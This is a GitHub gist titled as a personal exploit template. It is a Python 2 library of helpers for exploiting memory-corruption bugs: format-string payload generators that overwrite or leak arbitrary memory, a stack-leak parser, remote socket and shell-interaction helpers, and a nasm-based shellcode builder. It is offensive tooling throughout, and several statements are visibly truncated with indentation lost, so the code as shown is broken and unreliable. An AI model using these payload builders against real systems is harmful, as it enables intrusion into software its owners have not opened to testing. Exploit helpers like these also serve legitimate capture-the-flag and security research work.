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Created September 15, 2015 14:45
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Save hhc0null/d466965775483f010ebd to your computer and use it in GitHub Desktop.
a exploit template for myself.
#!/usr/bin/env python2
import binascii
import collections
import hashlib
import itertools
import numpy
import re
import shlex
import socket
import string
import struct
import subprocess
import sys
import telnetlib
import time
def read_until(f, delim='\n'):
data = ""
while not data.endswith(delim):
data +=
return data
def connect(rhp=("localhost", 1919)):
s = socket.create_connection(rhp)
f = s.makefile('rw', bufsize=0)
return s, f
def interact(s):
t = telnetlib.Telnet()
t.sock = s
print "[+] 4ll y0U n33D 15 5h3ll!!"
def p(x, t="<I"):
return struct.pack(t, x)
def u(x, t="<I"):
return struct.unpack(t, x)[0]
def unsigned(x):
return u(p(x, t="<i"), t="<I")
def fsb_overwrite(index, pairs):
# convert pairs of address and value to the dataset
dataset = dict()
for address, value in pairs:
x, y = struct.unpack("<HH", struct.pack("<I", value))
if x not in dataset.keys():
dataset[x] = set()
if y not in dataset.keys():
dataset[y] = set()
dataset = collections.OrderedDict(sorted(dataset.iteritems()))
# prepare an address part
addresses = sum(map(list, dataset.values()), list()) # nested list comprehension
addresses = struct.pack("<"+"I"*len(addresses), *addresses)
mark = addresses[-4:]
# prepare format part
count = 1
while True:
formats, previous = "", 0
for value in dataset.iterkeys():
if value != 0:
formats += "%{}x".format(value-previous)
formats += "%{}$hn".format('#'*count)*len(dataset[value])
previous = value
padding = "P"*(4-len(formats)%4) if len(formats)%4 != 0 else ""
index_format_ends = index + (formats+padding+addresses).index(mark)/4
digit = int(numpy.log10(index_format_ends)) + 1
if count == digit:
count += 1
rgx = re.compile("#"*count)
index_format_begins = index_format_ends - len(addresses)/4 + 1
# replace substitutions with index of each address
original_formats_length = len(formats)
substitution =, formats)
while substitution:
start, end = substitution.start(), substitution.end()
formats = formats[:start]+str(index_format_begins)+formats[end:]
index_format_begins += 1
substitution =, formats)
padding += "P"*(original_formats_length-len(formats))
# finally, generate the payload
payload = formats + padding + addresses
return payload
def fsb_dataleak(index, pairs):
# prepare a dataset which has leekee as address and leek size as number.
dataset = dict(pairs)
# prepare format part
mark = struct.pack("<I", dataset.keys()[-1])
addresses = "".join(struct.pack("<"+"I"*len(dataset.keys()), *dataset.keys()))
count = 1
while True:
formats = ""
for address in dataset.iterkeys():
formats += "%{}${}s".format('#'*count, dataset[address])
padding = "P"*(4-len(formats)%4) if len(formats)%4 != 0 else ""
index_format_ends = index + (formats+padding+addresses).index(mark)/4
if count == int(numpy.log10(index_format_ends)) + 1:
count += 1
# replace substitutions with index of each address
rgx = re.compile("#"*count)
original_formats_length = len(formats)
index_format_begins = index_format_ends - len(dataset.keys()) + 1
substitution =, formats)
while substitution:
start, end = substitution.start(), substitution.end()
formats = formats[:start]+str(index_format_begins)+formats[end:]
index_format_begins += 1
substitution =, formats)
# compensate the padding length.
padding += "P"*(original_formats_length-len(formats))
return formats + padding + addresses
def fsb_stackleak(data, write=True):
data = data.replace('(nil)', '0x0')
data = data.split('0x')[1:]
stack = map(lambda x: int('0x'+x, 16), data)
if write:
print map(lambda x: "0x%08x"%(x), stack)
return stack
def gen_shellcode(source, bits=32):
source = "".join([
"BITS %d\n"%(bits),
filename = hashlib.md5(source).hexdigest()
with open("/tmp/%s.s"%(filename), "wb") as f:
f.write(source)"nasm /tmp/%s.s -o /tmp/%s"%(filename, filename), shell=True)
with open("/tmp/%s"%filename, "rb") as f:
shellcode =
return filename, shellcode
def message(message_type, message_body, value=None):
text = ""
if value:
text = "[{}] {}: 0x{:08x}".format(message_type, message_body, value)
text = "[{}] {}".format(message_type, message_body)
print text
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